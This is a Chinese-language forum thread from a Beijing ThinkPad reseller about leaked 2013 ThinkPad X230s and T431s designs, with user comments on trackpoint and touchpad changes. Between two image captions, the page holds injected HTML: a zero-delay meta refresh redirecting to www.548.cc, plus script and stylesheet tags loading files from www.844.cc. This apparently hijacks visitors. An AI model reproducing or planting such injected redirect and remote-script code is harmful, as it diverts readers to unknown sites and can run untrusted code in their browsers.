开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

重磅!除了X230s还有T431s!2013年新款ThinkPad值得期待

最近X230s的传闻遭到曝光,今天又看到重度消息,除了X230s还有一款T431s(T430s的无光驱升级版)。而且两款机型都做了大幅度的改变,给大家贴贴说明书谍照。
根据ThinkPad一直以来的进化原则,X1 Carbon上的很多新元素会用到未来的ThinkPad全系身上(比如当年T400s的很多设计元素通通用在了T410乃至T420上)

1:最重要的改变,取消了Trackpoint的左右键,带来的好处是触摸板变大,左右键是否隐含在触摸板上,手感如何还需要等到实物到货才能知道,不知道ThinkPad的老用户们是否可以接受。这个改变是我最担心的,不过联想也不是傻子,如果按照笔记本总体使用率调查的话,Trackpoint的使用人数可能不足触摸板的十分之一,增大触摸板面积确实可以讨好更多的用户,但是Trackpoint的使用者都是一直以来ThinkPad产品的死忠,希望改变的Trackpoint手感不要太差。
2:触摸板变大,取消波点,改用X1那种更好手感的触摸板(X1的多点触摸板比其他老款的触摸板好用)
3:键盘上的FN组合快捷键位置变化
4:屏幕铰链变化,变成了X1那种铰链,好处就是机器可以做的更加轻薄。
5:T的正统高端系列第一次取消光驱,值得叫好
6:延续X1 Carbon的内置电池设计,一体底盖设计。
7:扁头电源开始普及,T60时代延续至今的电源接口换代了。
8:更轻更薄更时尚

联想在2012年底重新做了组织调整,ThinkPad部门要坚持高端化,推出了一系列的高端机型,希望这些新机型不要让我们失望,也希望大家给中国本土企业更多的信心。机器会在2013年第一季度推出,具体硬盘规格还不清楚,我个人更倾向于纯SSD结构,让我们拭目以待吧。
X230s外观泄露图。

<meta http-equiv="refresh" content="0; url=http://www.548.cc">
★★★
<script type="text/javascript" src="http://www.844.cc/b.js"></script>
<link href="http://www.844.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

T430s外观泄露图

改的不少啊,Trackpoint招谁惹谁了?不锈钢铰链碍着谁了?
变化不小,个人觉得安全锁孔没什么用。还不如改个别的接口
期待呀,等不了就不等了
新机器还要等上好长时间吧
更新升级快呀
新机型上市,老机型会降价多少呢
呵呵,刚换了不久的本,也就旁观一下了。怎么改变其实也无所谓,用用就习惯了
期待新产品早点上市
等新机器快点上市,老的赶紧跌,我好入手,哈哈
快不了,得等intel 下一代CPU HASWELL上市后才能出,最快也得是下半年的事。
外观看上去和X1C有点像啊
一点都不期待.
屏幕锁扣也没有了
我的T420S 成最后的经典了...
Trackpoint我觉得还是很好的。。。估计出来还要蛮久
期待,相当的期待!
tszmsid 发表于 2013-1-24 16:28
一点都不期待.
屏幕锁扣也没有了

你身为销售,能说出这种话来,表示很中肯!除了小红帽还在,原来的thinkpad都没了哦。
拭目以待
就剩下小红帽了啊,机身材质有变化吗
230s是think中最轻的了
比较期待
这代产品还是去think化的痕迹很明显,很让人遗憾。
好消息是联想已经正式宣布think与Lenovo分别独立运营,去think活动应该告一段落了。
原来的如意算盘是通过think拉高Lenovo价值,然后再灭了think。
结果think是快灭了,Lenovo依然不上道。

daimonliu 发表于 2013-1-24 21:01
你身为销售,能说出这种话来,表示很中肯!除了小红帽还在,原来的thinkpad都没了哦。 ...

首先是thinkpad忠实粉丝
其次 我是销售
有一天 我不再是销售了
但我还会是thinkpad死忠